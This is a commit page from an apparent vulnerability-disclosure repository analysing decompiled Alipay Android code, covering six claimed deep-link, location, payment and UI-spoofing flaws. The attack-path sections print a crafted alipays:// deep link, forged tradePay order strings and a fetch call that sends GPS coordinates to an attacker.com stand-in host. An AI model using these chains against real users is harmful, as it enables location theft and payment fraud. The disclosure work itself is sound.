icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

update: SEO/privacy overhaul — 36 CVE stats, redact case numbers, full sitemap

Browse Source 
- Meta/OG/Twitter tags: 17→36 CVEs, 6→9+ countries, SecurityGuard SDK keywords
- Sitemap: 5→12 URLs with correct lastmod dates
- Privacy: redact CSSF/CIRCL/PDPC case numbers, mask regulator staff names
- Content: add 6 new article pages + evidence screenshots
- Numbers: update all CVE counts (6→36, 11 MITRE tickets)

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-25 05:27:49 +08:00
parent 69a39638fb
commit a3825c939f
41 changed files with 5440 additions and 47 deletions
Download Patch File Download Diff File Expand all files Collapse all files

181
evidence/code_evidence_summary.md Normal file
View File

@@ -0,0 +1,181 @@
# Alipay APK 代码证据汇总
> APK 版本: Alipay 10.8.30.8000 (jadx 反编译)
> 生成日期: 2026-03-16
> 证据范围: 6个 CVE 的关键源码片段
---
## 快速索引
| CVE | 标题 | CWE | CVSS | 关键文件 | 证据文件 |
|-----|------|-----|------|---------|---------|
| CVE-1 | DeepLink URL Scheme绕过 | CWE-939 | 9.1 | SchemeLauncherActivity.java, SchemeServiceImpl.java | [cve1/code_evidence.md](cve1/code_evidence.md) |
| CVE-2 | GPS静默外泄 | CWE-359 | 7.4 | H5LocationPlugin.java | [cve2/code_evidence.md](cve2/code_evidence.md) |
| CVE-3 | tradePay未授权调用 | CWE-940 | 8.6 | H5TradePayPlugin.java | [cve3/code_evidence.md](cve3/code_evidence.md) |
| CVE-4 | UI欺骗 showToast/setTitle | CWE-451 | 8.1 | H5ToastPlugin.java, BNTitlePlugin.java | [cve4/code_evidence.md](cve4/code_evidence.md) |
| CVE-5 | 端到端数据外泄链 | CWE-200 | 8.6 | (引用 CVE-1~4) | [cve5/code_evidence.md](cve5/code_evidence.md) |
| CVE-6 | ds.alipay.com白名单绕过 | CWE-601+939 | 9.3 | ApiShareConfig.java, H5ServiceImpl.java | [cve6/code_evidence.md](cve6/code_evidence.md) |
---
## CVE-1: DeepLink URL Scheme绕过
**关键代码位置**:
- `sources/com/alipay/mobile/quinox/SchemeLauncherActivity.java` — 行 240-338
- `sources/com/alipay/mobile/framework/service/common/impl/SchemeServiceImpl.java` — 行 1161-1179, 2108-2124
**核心问题**: `getParams(Uri uri)` 将所有 URI query parameter 原样复制到 Bundle无域名白名单过滤`startApp("", "20000067", bundle)` 以 H5 WebView appId 直接加载攻击者 URL。
```java
// SchemeServiceImpl.java 行 1174-1177
Bundle bundle = new Bundle();
for (String str : o(uri2)) {
bundle.putString(str, uri2.getQueryParameter(str)); // 无白名单过滤
}
```
```java
// SchemeServiceImpl.java 行 2123
this.this$0.getMicroApplicationContext().startApp(null, "20000067", params, extInfo, null);
// "20000067" = H5 WebView 容器url 参数未经验证
```
---
## CVE-2: GPS静默外泄
**关键代码位置**:
- `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java` — 行 949-958 (getLocation), 1367-1395 (judgeGrant)
**核心问题**: `judgeGrant()` 仅检查 OS 位置权限,无 WebView 页面来源域名校验。
```java
// H5LocationPlugin.java 行 1379-1382
LBSService lBSService = (LBSService) ComponentService.get(LBSService.class);
if (lBSService != null && lBSService.hasLocationPermission()) {
z = true; // 唯一判断OS权限已授予。无来源域名校验。
}
```
```java
// H5LocationPlugin.java 行 953-957
if (judgeGrant(h5Event.getTarget() instanceof H5Page ? (H5Page) h5Event.getTarget() : null, h5BridgeContext)) {
new H5GetLocationAction(h5Event, h5BridgeContext, this.h5Location, j).handleEvent();
// GPS 坐标直接回调给 WebView
}
```
---
## CVE-3: tradePay未授权调用
**关键代码位置**:
- `sources/com/alipay/mobile/framework/service/ext/phonecashier/H5TradePayPlugin.java` — 行 522-603, 686-701
**核心问题**: `onPrepare()` 对所有页面注册 `tradePay` 动作;`startPaymentWithOrderStr()` 中来源 URL 只放入日志 Map不做拒绝决策。
```java
// H5TradePayPlugin.java 行 698
h5EventFilter2.addAction("tradePay"); // 所有页面均可调用,无域名过滤
```
```java
// H5TradePayPlugin.java 行 577-592
str4 = H5PayUtil.generateH5bizContext4OrderStr(str4, h5Page.getUrl());
hashMap.put("invoke_from_source", "h5page");
hashMap.put("invokeFromReferUrl", realRefer); // 仅日志,无访问控制
// ...
phoneCashierServcie.boot(str4, a(aVar, null, null), hashMap); // 直接启动收银台
```
---
## CVE-4: UI欺骗 showToast/setTitle
**关键代码位置**:
- `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java` — 行 144-163, 213-225
- `sources/com/alipay/android/app/birdnest/jsplugin/BNTitlePlugin.java` — 行 84-91
**核心问题**: JS 传入的 `content`/`title` 字符串直接传入 `Toast.makeText()``mTitleBar.setTitleText()`,无内容过滤,无来源检查。
```java
// H5ToastPlugin.java 行 151-158
String string = XriverH5Utils.getString(param, "content"); // JS 传入,攻击者控制
// ...
showToast(h5Event.getActivity(), getImageId(string2), string, 17, 0, 0, i3);
// string 直接传入 Toast.makeText无任何过滤
```
```java
// BNTitlePlugin.java 行 85-88
String optString2 = new JSONObject(bNEvent2.getArgs()).optString("title", null);
if (optString2 != null) {
bNTitlePlugin.mTitleBar.setTitleText(optString2); // 攻击者字符串直接渲染到导航栏
}
```
---
## CVE-5: 端到端数据外泄链
CVE-5 是 CVE-1 + CVE-2 + CVE-3 + CVE-4 的组合,无独立代码。完整攻击链:
```
1. alipays://platformapi/startApp?appId=20000067&url=https://attacker.com
→ SchemeLauncherActivity (CVE-1入口)
2. my.getLocation()
→ judgeGrant(): hasLocationPermission()==true → 返回GPS坐标 (CVE-2)
3. my.setTitle({ title: "支付宝官方安全验证" })
my.showToast({ content: "身份验证通过 ✓" })
→ 伪造系统UI (CVE-4)
4. my.tradePay({ orderStr: "...total_amount=999..." })
→ 触发支付界面,用户被诱导确认 (CVE-3)
```
参考: [cve5/code_evidence.md](cve5/code_evidence.md)
---
## CVE-6: ds.alipay.com白名单绕过
**关键代码位置**:
- `sources/com/alipay/common/ApiShareConfig.java` — 行 52-59
- `sources/com/alipay/mobile/nebulaappproxy/api/config/WalletDefaultConfig.java` — 行 77
- `sources/com/alipay/mobile/nebulacore/wallet/H5ServiceImpl.java` — 行 1263-1277
**核心问题**: `h5_stripLandingConfig``ds.alipay.com` 列为受信任前缀,`startAppNormal:true` 允许自动提取 `scheme` 参数并以内部信任级别分发,实现绕过 `isOutside` 检查。
```java
// ApiShareConfig.java 行 59 (精简)
H5_STRIP_LANDING_CONFIG =
"{\"urlPrefix\":[\"https://ds.alipay.com/?\",...],\"startAppNormal\":true,...}";
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^
// ds.alipay.com 被列为受信任 允许自动分发
```
```java
// H5ServiceImpl.java 行 1268-1272
if (XriverH5Utils.isStripLandingURLEnable(str2, "startAppNormal")) {
String stripLandingURL = XriverH5Utils.getStripLandingURL(str2);
// str2 = "https://ds.alipay.com/?scheme=alipays://...attacker.com..."
// getStripLandingURL 提取 scheme 参数值 → 攻击者的 alipays:// URI
boolean goToSchemeService = h5EnvProvider.goToSchemeService(stripLandingURL, params);
// 以内部信任级别分发,绕过外部来源标记
}
```
---
## 代码证据质量评估
| CVE | 找到直接证据 | 证据强度 | 说明 |
|-----|------------|---------|------|
| CVE-1 | 是 | 强 | SchemeServiceImpl.getParams() + startApp("20000067") 完整链路 |
| CVE-2 | 是 | 强 | judgeGrant() 仅检查 OS 权限,代码一目了然 |
| CVE-3 | 是 | 强 | H5TradePayPlugin.onPrepare() + boot() 无来源检查 |
| CVE-4 | 是 | 强 | H5ToastPlugin + BNTitlePlugin 两个实现均已找到 |
| CVE-5 | 是 | 强 | 组合链,各 CVE 证据已独立确认 |
| CVE-6 | 是 | 强 | stripLandingConfig JSON 硬编码在两个源文件中 |
所有证据均来自 jadx 反编译的 Java 源码,文件路径可在 `/Users/anwu/Desktop/apk_any/apk/alipay/analysis/jadx_output/sources/` 下直接验证。

202
evidence/cve1/code_evidence.md Normal file
View File

@@ -0,0 +1,202 @@
# CVE-1: DeepLink URL Scheme绕过 (CWE-939) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 补充完整调用链代码证据
## 关键类/方法
### SchemeLauncherActivity — DeepLink 入口 Activity
- 文件: `sources/com/alipay/mobile/quinox/SchemeLauncherActivity.java`
- 行号: 240-338
```java
// onCreate: Intent 直接分发,无来源身份验证
@Override
public void onCreate(Bundle bundle) {
super.onCreate(bundle2);
try {
if (DexAOPEntry.android_app_Activity_getIntent_proxy(this) == null) {
finish();
return;
}
LoggerFactory.getTraceLogger().info(w0.f164911a, " enter onCreate..");
// ... (window styling only, no caller verification)
setRequestedOrientation(1);
a();
schemeLauncherActivity.f192533a.j(bundle2); // 直接分发给 scheme 处理器
} catch (Exception e2) {
LoggerFactory.getTraceLogger().error(w0.f164911a, e2);
finish();
}
}
// onNewIntent: 同样无来源校验
@Override
public void onNewIntent(Intent intent) {
super.onNewIntent(intent2);
setIntent(intent2);
LoggerFactory.getTraceLogger().info(w0.f164911a, " enter onNewIntent..");
a();
schemeLauncherActivity.f192533a.l(intent2); // 直接转发,无验证
}
```
### SchemeServiceImpl — getParams() URL 提取无过滤
- 文件: `sources/com/alipay/mobile/framework/service/common/impl/SchemeServiceImpl.java`
- 行号: 1161-1179
```java
@Override
public Bundle getParams(Uri uri) {
Bundle bundle = new Bundle();
for (String str : o(uri2)) {
bundle.putString(str, uri2.getQueryParameter(str)); // URI 参数原样复制,无白名单过滤
}
bundle.putString("appId", getSourceAppId(uri2));
return bundle;
// 整个方法:零域名验证,零签名检查
}
// getSourceAppId 解析 (行 1437):
// "app".equals(uri2.getHost()) ? uri2.getPath().substring(1) : uri2.getQueryParameter("appId")
```
### SchemeServiceImpl — startApp 触发 H5 容器 (appId=20000067)
- 文件: `sources/com/alipay/mobile/framework/service/common/impl/SchemeServiceImpl.java`
- 行号: 1054-1065 (openurl) + 2108-2124 (startapp)
```java
// openurl action: URL 原样传入 H5 容器
Bundle bundle = new Bundle();
String str3 = SchemeService.h5Url;
if (TextUtils.isEmpty(str2)) { str2 = str3; }
H5ParamCompService h5ParamCompService = ComponentService.get(H5ParamCompService.class);
if (h5ParamCompService != null) {
bundle.putString(h5ParamCompService.getUrl(), str2); // URL 无验证放入
bundle.putString(h5ParamCompService.getShowToolBar(), "NO");
}
microApplicationContext.startApp("", "20000067", bundle); // 启动 H5 容器
// startapp action (process() 方法):
public void process() {
Bundle params = this.this$0.getParams(this.val$externUriSub, this.val$schemeInnerSource);
// ...
params.putString("appId", this.val$sourceAppId);
SchemeServiceImpl.a(this.this$0, params, this.val$extInfo);
this.this$0.getMicroApplicationContext().startApp(null, "20000067", params, this.val$extInfo, null);
// ^ "20000067" = H5 WebView 容器URL 未经域名白名单直接加载
}
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
### SchemeLauncherActivity
**File**: `sources/com/alipay/mobile/quinox/SchemeLauncherActivity.java`
**Lines**: 240-288
```java
@Override // android.app.Activity
public void onCreate(Bundle bundle) {
// ...
super.onCreate(bundle2);
try {
getWindow().getDecorView();
if (DexAOPEntry.android_app_Activity_getIntent_proxy(this) == null) {
finish();
return;
}
LoggerFactory.getTraceLogger().info(w0.f164911a, " enter onCreate..");
// ... (window styling only)
setRequestedOrientation(1);
a();
schemeLauncherActivity.f192533a.j(bundle2); // delegates directly to scheme processor
} catch (Exception e2) {
LoggerFactory.getTraceLogger().error(w0.f164911a, e2);
finish();
}
}
@Override // android.app.Activity
public void onNewIntent(Intent intent) {
// ...
super.onNewIntent(intent2);
setIntent(intent2);
LoggerFactory.getTraceLogger().info(w0.f164911a, " enter onNewIntent..");
a();
schemeLauncherActivity.f192533a.l(intent2); // delegates directly, no validation
}
```
### SchemeLaunchRouter — processSchemeInner and schemeServiceProcess
**File**: `sources/com/alipay/mobile/commonbiz/biz/SchemeLaunchRouter.java`
**Lines**: 2164-2256
```java
public void processSchemeInner(Uri uri, String str, String str2, String str3, String str4) {
// ...
if ((schemeService = (SchemeService) TLCommonUtils.getService(SchemeService.class)) != null) {
try {
SourceInfo isSchemeFromOutSide = isSchemeFromOutSide();
boolean isOutside = isSchemeFromOutSide.isOutside();
Bundle bundle = new Bundle();
SchemeUtils.addIntentBundleParams(bundle, this.mIntent);
bundle.putBoolean("isOriginStartFromExternal", isOutside);
TLCommonUtils.addFromSchemeRouter(bundle, this.mIntent);
bundle.putString("sourcePackageName", isSchemeFromOutSide.getPackageName());
SchemeBootLinkManager.getInstance().initSkipLoginOrSkipHomepage(uri.toString());
schemeServiceProcess(uri, isOutside, null, bundle); // dispatches immediately
} catch (Exception e2) { ... }
}
}
public void schemeServiceProcess(Uri uri, boolean z, String str, Bundle bundle) {
// ...
SchemeService schemeService = (SchemeService) TLCommonUtils.getService(SchemeService.class);
// ...
schemeService.processAsync(uri2, z, str, bundle, new SchemeProcessCallback(this) { ... });
// NO caller identity verification, NO origin authentication
}
```
### Vulnerability Analysis (原有)
The `SchemeLauncherActivity` is an exported Android Activity registered in the app manifest to handle `alipays://` and `alipay://` URI schemes. When it receives an incoming Intent (either via `onCreate` or `onNewIntent`), it immediately delegates the URI to `SchemeLaunchRouter` — only checking whether the Intent itself is null, never verifying who sent it or whether the caller is trusted.
The `schemeServiceProcess` method propagates the URI down to `SchemeService.processAsync()` carrying only a boolean `isOutside` flag (whether it came from outside the app). Critically, there is no authentication gate: no check that the caller has a valid session token, no signature verification of the calling package, and no allowlist enforcement before the scheme is dispatched. Any app or web page that can fire an `alipays://` deep-link Intent — including a malicious website opened in any browser — can trigger arbitrary in-app navigation in Alipay without the user having been identified or consented to the specific action being dispatched.
---
## 漏洞根因 (基于代码分析)
`SchemeLauncherActivity` 注册为支付宝的 DeepLink 入口,接收 `alipay://` / `alipays://` URI。`onCreate`/`onNewIntent` 在取得 Intent 后**直接转发**,无调用方身份验证。
`SchemeServiceImpl.getParams()` 将所有 URI query parameter 原样复制到 Bundle行 1174-1176**无域名白名单过滤**。最终 `startApp(null, "20000067", params)` 将携带任意 `url=` 值的 Bundle 传入 H5 WebView 容器。
关键缺失:
1. 无来源签名验证Intent caller 包名未受信校验)
2. `getParams()` 无 URL 域名白名单
3. appId=20000067H5页面容器`url` 参数无过滤
## 攻击路径
```
外部 App / 短链 / 网页点击
Intent: alipays://platformapi/startApp?appId=20000067&url=https://attacker.com
SchemeLauncherActivity.onCreate() [无来源校验]
f192533a.j(bundle) → SchemeServiceImpl.processAsync()
getParams(uri) [无域名白名单,原样复制 url 参数]
MicroApplicationContext.startApp("", "20000067", params)
H5 WebView 加载 https://attacker.com
攻击者页面调用 JSBridge: tradePay / getLocation / setTitle / toast
```

BIN
evidence/cve1/cve1_retest.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 77 KiB

BIN
evidence/cve1/cve1_v2529_20260316_151756.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 77 KiB

178
evidence/cve2/code_evidence.md Normal file
View File

@@ -0,0 +1,178 @@
# CVE-2: GPS静默外泄 (CWE-359) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 补充完整 judgeGrant 代码证据
## 关键类/方法
### H5LocationPlugin — judgeGrant() 权限检查逻辑
- 文件: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
- 行号: 1367-1395
```java
public boolean judgeGrant(H5Page h5Page, H5BridgeContext h5BridgeContext) {
// ...
boolean z = false;
if (h5Page == null) {
return false;
}
LBSService lBSService = (LBSService) ComponentService.get(LBSService.class);
if (lBSService != null && lBSService.hasLocationPermission()) {
z = true; // 唯一判断条件: OS 级别的位置权限是否已授予支付宝进程
}
// 缺失检查: h5Page.getUrl() 的域名白名单
// 缺失检查: 调用方 mini-program appId 白名单
// 缺失检查: 用户针对本次请求页面的明确同意
if (!z) {
JSONObject jSONObject = new JSONObject();
jSONObject.put("error", (Object) 16);
jSONObject.put("errorMessage", (Object) H5PluginResourceUtil.getString("get_location_auth_failed"));
if (h5BridgeContext != null) {
h5BridgeContext.sendBridgeResult(jSONObject);
}
}
return z;
}
```
### H5LocationPlugin — getLocation() 分发
- 文件: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
- 行号: 949-958
```java
public void getLocation(H5Event h5Event, H5BridgeContext h5BridgeContext, long j) {
// ...
LoggerFactory.getTraceLogger().info("H5LocationPlugin", "getLocation");
if (judgeGrant(h5Event.getTarget() instanceof H5Page ? (H5Page) h5Event.getTarget() : null, h5BridgeContext)) {
new H5GetLocationAction(h5Event, h5BridgeContext, this.h5Location, j).handleEvent();
// ^ 直接返回 GPS 坐标给 WebView 回调,无页面来源检查
} else {
LoggerFactory.getTraceLogger().info("H5LocationPlugin", "getLocation, no grant auth");
}
}
```
### H5LocationPlugin — onPrepare() JSAPI 注册 (无页面域名过滤)
- 文件: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
- 行号: 1397-1426
```java
@Override
public void onPrepare(H5EventFilter h5EventFilter) {
// ...
h5EventFilter2.addAction("getLocation"); // 所有加载的页面均可调用
h5EventFilter2.addAction("getCurrentLocation");
h5EventFilter2.addAction("prefetchLocation");
// ... 16 个位置相关 API 均无来源过滤
// 注意: 没有域名/appId 白名单过滤
}
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
### H5LocationPlugin — judgeGrant
**File**: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
**Lines**: 1367-1395
```java
public boolean judgeGrant(H5Page h5Page, H5BridgeContext h5BridgeContext) {
// ...
boolean z = false;
if (h5Page == null) {
return false;
}
LBSService lBSService = (LBSService) ComponentService.get(LBSService.class);
if (lBSService != null && lBSService.hasLocationPermission()) {
z = true;
}
if (!z) {
JSONObject jSONObject = new JSONObject();
jSONObject.put("error", (Object) 16);
jSONObject.put("errorMessage", (Object) H5PluginResourceUtil.getString("get_location_auth_failed"));
if (h5BridgeContext != null) {
h5BridgeContext.sendBridgeResult(jSONObject);
}
// ...
}
return z;
}
```
### H5LocationPlugin — getLocation dispatch
**File**: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
**Lines**: 949-958
```java
public void getLocation(H5Event h5Event, H5BridgeContext h5BridgeContext, long j) {
// ...
LoggerFactory.getTraceLogger().info("H5LocationPlugin", "getLocation");
if (judgeGrant(h5Event.getTarget() instanceof H5Page ? (H5Page) h5Event.getTarget() : null, h5BridgeContext)) {
new H5GetLocationAction(h5Event, h5BridgeContext, this.h5Location, j).handleEvent();
} else {
LoggerFactory.getTraceLogger().info("H5LocationPlugin", "getLocation, no grant auth");
}
}
```
### H5LocationPlugin — prefetchLocation also calls judgeGrant
**File**: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java`
**Lines**: 1462-1469
```java
public void prefetchLocation(H5Event h5Event, H5BridgeContext h5BridgeContext, long j) {
// ...
if (judgeGrant(h5Event.getTarget() instanceof H5Page ? (H5Page) h5Event.getTarget() : null, h5BridgeContext)) {
if (this.h5Location == null) {
LoggerFactory.getTraceLogger().info("H5LocationPlugin", "prefetchLocation, h5Location == null");
} else {
this.h5Location.getLocation(h5Event, h5BridgeContext, new LocationListener(this, h5Event) { ... });
}
}
}
```
### Vulnerability Analysis (原有)
The `judgeGrant` method is the sole access-control gate for the `getLocation` JSBridge API. Its decision logic is exactly: **if the OS-level location permission has been granted to the Alipay process, return `true`**. There is no inspection of the WebView page origin (URL/domain), no mini-program appId allowlist, and no user-visible consent prompt scoped to the requesting page.
Because Alipay routinely holds the OS location permission (required for native features such as nearby services and maps), `lBSService.hasLocationPermission()` returns `true` in practice for all users who have ever opened the app's location-dependent features. As a result, any untrusted page loaded in a Nebula WebView — including a page reached via the `alipays://platformapi/startapp` deep-link — can call the `my.getLocation` JSBridge method and receive the device's precise GPS coordinates without any additional user confirmation. The coordinates are returned in the JSBridge callback and can be forwarded to an attacker-controlled server silently in the background.
---
## 漏洞根因 (基于代码分析)
`H5LocationPlugin.judgeGrant()``getLocation` JSAPI 的**唯一访问控制门**。其判断逻辑:
```
if (lBSService.hasLocationPermission()) → return true
```
该方法仅检查支付宝进程是否获得过 OS 位置权限(用户曾经授权即永久 true**完全没有**
- 检查 `h5Page.getUrl()` 的域名
- 检查调用方的 appId 白名单
- 向用户展示"某页面想获取你的位置"的确认对话框
`onPrepare()` 在注册 `getLocation` 动作时也无任何域名过滤,任何加载到 Nebula H5 容器的页面均可触发。
## 攻击路径
```
攻击者控制的网页 (https://attacker.com)
↓ 通过 CVE-1 DeepLink 或直接链接被加载进支付宝 WebView
my.getLocation({ type: 2 }) [JSBridge 调用]
H5LocationPlugin.handleEvent() → getLocation()
judgeGrant(): lBSService.hasLocationPermission() == true [用户曾授权过]
H5GetLocationAction.handleEvent() → 获取精确 GPS 坐标
坐标通过 JSBridge 回调返回给攻击者页面
fetch("https://attacker.com/collect?lat=...&lng=...") [静默上传]
```

BIN
evidence/cve2/cve2_v2529_20260316_152102.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

207
evidence/cve3/code_evidence.md Normal file
View File

@@ -0,0 +1,207 @@
# CVE-3: tradePay未授权调用 (CWE-940) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 补充 H5TradePayPlugin 代码证据
## 关键类/方法
### H5TradePayPlugin — onPrepare() JSAPI 注册
- 文件: `sources/com/alipay/mobile/framework/service/ext/phonecashier/H5TradePayPlugin.java`
- 行号: 686-701
```java
@Override
public void onPrepare(H5EventFilter h5EventFilter) {
// ...
h5EventFilter2.addAction("tradePay"); // 注册给所有 WebView 页面,无域名过滤
h5EventFilter2.addAction("deposit");
h5EventFilter2.addAction(TRADE_URL); // "tradeUrl"
}
```
### H5TradePayPlugin — startPaymentWithOrderStr() 来源域名仅用于日志
- 文件: `sources/com/alipay/mobile/framework/service/ext/phonecashier/H5TradePayPlugin.java`
- 行号: 522-603
```java
public boolean a(String str, a aVar, H5Event h5Event, String str2, Map<String, String> map) {
// ...
if (h5Page != null) {
Bundle params = h5Page.getParams();
String string = H5Utils.getString(params, "appId");
boolean z2 = H5Utils.getBoolean(params, "isTinyApp", false);
// ...
if (TextUtils.equals(str2, "tradePay")) {
z = true;
if (z2) { // 来自小程序
str4 = H5PayUtil.generateTinybizContext4OrderStr(str4, string, str3);
hashMap.put("invoke_from_source", "tinyapp");
hashMap.put("invoke_from_id", string);
hashMap.put("invoke_from_api", "tradepay");
} else { // 来自 H5 页面
str4 = H5PayUtil.generateH5bizContext4OrderStr(str4, h5Page.getUrl());
hashMap.put("invoke_from_source", "h5page");
hashMap.put("invoke_from_api", "tradepay");
String realRefer = H5Utils.getRealRefer(h5Page, h5Page.getUrl());
// ... realRefer 被截断到 30 字符,只放入日志 map不做校验
hashMap.put("invokeFromReferUrl", realRefer); // 仅日志,非访问控制
}
// ...
phoneCashierServcie.boot(str4, a(aVar, null, null), hashMap);
// ^ 直接启动收银台,来源 URL 只进日志,不拒绝非白名单调用方
}
}
}
```
### H5TradePayPlugin — 常量定义
- 文件: `sources/com/alipay/mobile/framework/service/ext/phonecashier/H5TradePayPlugin.java`
- 行号: 42-48
```java
public static final String APPID = "appid";
public static final String APPID_CONTENT = "alipay";
public static final String DEPOSIT = "deposit";
public static final String SYSTEM = "system";
public static final String SYSTEM_CONTENT = "android";
public static final String TAG = "H5TradePayPlugin";
public static final String TRADE_PAY = "tradePay"; // JSAPI 名称
public static final String TRADE_URL = "tradeUrl";
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
### TradePayBridgeExtension — tradePay (annotated entry point)
**File**: `sources/com/alipay/mobile/phonecashier/TradePayBridgeExtension.java`
**Lines**: 270-287
```java
@NativeActionFilter
@Remote
public void tradePay(@BindingApiContext ApiContext apiContext, @BindingRequest JSONObject jSONObject,
@BindingCallback BridgeCallback bridgeCallback) {
// ...
if (jSONObject == null) {
handleException(bridgeCallback);
return;
}
if (apiContext instanceof ExtHubApiContext) {
this.mBizType = ((ExtHubApiContext) apiContext).getBizType();
this.mAppId = apiContext.getAppId(); // records caller appId for logging only
}
this.mBizContext = jSONObject.getString(LONG_SAFEPAY_CONTEXT);
this.needEraseMemo = !TextUtils.equals(
PhoneCashierMspEngine.hn().getWalletConfig("MQP_degrade_tradepay_erase_memo_10556"),
"10000");
tradePay(bridgeCallback, jSONObject); // proceeds directly to payment boot
}
```
### TradePayBridgeExtension — tradePay (payment boot, no origin validation)
**File**: `sources/com/alipay/mobile/phonecashier/TradePayBridgeExtension.java`
**Lines**: 219-268
```java
public void tradePay(BridgeCallback bridgeCallback, JSONObject jSONObject) {
// ...
PhoneCashierServcie phoneCashierServcie = (PhoneCashierServcie)
LauncherApplicationAgent.getInstance()
.getMicroApplicationContext()
.findServiceByInterface(PhoneCashierServcie.class.getName());
if (phoneCashierServcie == null) {
LogUtil.record(1, TAG, "cashierService is null.");
handleException(bridgeCallback);
return;
}
String string = jSONObject.getString("bizContext");
if (TextUtils.isEmpty(string)) {
string = this.mBizContext;
}
if (jSONObject.containsKey(ApLinkTokenUtils.ORDER_STRING_SPM_EXT_KEY)) {
this.mOrderInfo = jSONObject.getString(ApLinkTokenUtils.ORDER_STRING_SPM_EXT_KEY);
// appends bizcontext to orderInfo string, then boots cashier
if (!TextUtils.isEmpty(string) && !TextUtils.isEmpty(this.mOrderInfo)
&& !this.mOrderInfo.contains("&bizcontext=")) {
this.mOrderInfo += "&bizcontext=\"" + string + "\"";
}
HashMap hashMap = new HashMap();
addExtendInfo(jSONObject, hashMap);
phoneCashierServcie.boot(this.mOrderInfo, getPayCallback(bridgeCallback), hashMap);
// ... logging only, no origin check before this call
return;
}
if (jSONObject.containsKey("tradeNO")) {
this.mTradeNo = jSONObject.getString("tradeNO");
String string2 = jSONObject.getString("bizType");
if (TextUtils.isEmpty(string2)) {
string2 = "trade";
}
PhoneCashierOrderExp phoneCashierOrderExp = new PhoneCashierOrderExp();
phoneCashierOrderExp.setBizType(string2);
phoneCashierOrderExp.setOrderNo(this.mTradeNo);
// ...
phoneCashierServcie.boot(phoneCashierOrderExp, payCallback, hashMap3);
// boots cashier with caller-supplied tradeNO, no origin validation
}
}
```
### TradePayBridgeExtension — permit() returns null
**File**: `sources/com/alipay/mobile/phonecashier/TradePayBridgeExtension.java`
**Lines**: 206-217
```java
@Override // com.alibaba.ariver.kernel.api.security.Guard
public Permission permit() {
ChangeQuickRedirect changeQuickRedirect = f83420;
if (changeQuickRedirect == null) {
return null; // <-- no permission declared; framework allows all callers
}
PatchProxyResult proxy = PatchProxy.proxy(this, changeQuickRedirect, "12", Permission.class);
if (proxy.isSupported) {
return (Permission) proxy.result;
}
return null;
}
```
### Vulnerability Analysis (原有)
`TradePayBridgeExtension` implements the `tradePay` JSBridge API exposed to every WebView page running inside Alipay. The annotated entry point extracts `appId` and `bizType` from the caller context but uses them only for logging (via `addEventLog`), never as an access-control decision. The critical security guard point is `permit()`, which unconditionally returns `null` — the Ariver framework interprets a null `Permission` as "no restriction", meaning the API is callable from any page regardless of origin.
When `phoneCashierServcie.boot()` is called it opens the native payment cashier UI with the caller-supplied `orderInfo` string or `tradeNO`. An attacker who loads a malicious page via a deep-link (CVE-1) can therefore invoke `tradePay` with a crafted order string, launching the payment UI for an attacker-controlled transaction. While the user still sees a confirmation UI before funds are debited, the attacker controls the displayed price and recipient, enabling social-engineering / UI-spoofing fraud when combined with CVE-4.
---
## 漏洞根因 (基于代码分析)
`H5TradePayPlugin``TradePayBridgeExtension` 均将 `tradePay` JSAPI 注册给支付宝 H5 容器内的**所有**页面,没有来源域名白名单过滤。
关键证据:
1. `onPrepare()``addAction("tradePay")` 无任何域名条件
2. `startPaymentWithOrderStr()` 中来源 URL (`h5page.getUrl()`) 只放入日志 Map不做拒绝决策
3. `permit()` 返回 `null`,框架解释为"无限制"
攻击者通过 CVE-1 将页面加载进支付宝 WebView 后,可立即调用 `my.tradePay({ orderStr: ... })` 触发支付界面,用户看到的收款方/金额均由攻击者的 `orderStr` 控制。
## 攻击路径
```
通过 CVE-1 加载攻击者页面到支付宝 WebView
my.tradePay({ orderStr: "out_trade_no=FAKE&total_amount=9999&..." })
H5TradePayPlugin.interceptEvent() / handleEvent()
startPaymentWithOrderStr() — 来源 URL 只记日志,不拒绝
phoneCashierServcie.boot(orderStr, callback, extInfo)
收银台 UI 弹出,显示攻击者控制的金额和收款方
↓ (结合 CVE-4 的 setTitle/showToast 伪装)
用户被诱导确认支付
```

BIN
evidence/cve3/cve3_blocked_on_retest.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
evidence/cve3/cve3_obf_page_rendered.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 269 KiB

BIN
evidence/cve3/cve3_proof_20260316_155434.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 168 KiB

BIN
evidence/cve3/cve3_simple_20260316_154256.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
evidence/cve3/cve3_tradepay_triggered.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 168 KiB

BIN
evidence/cve3/cve3_v2529_20260316_152128.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

BIN
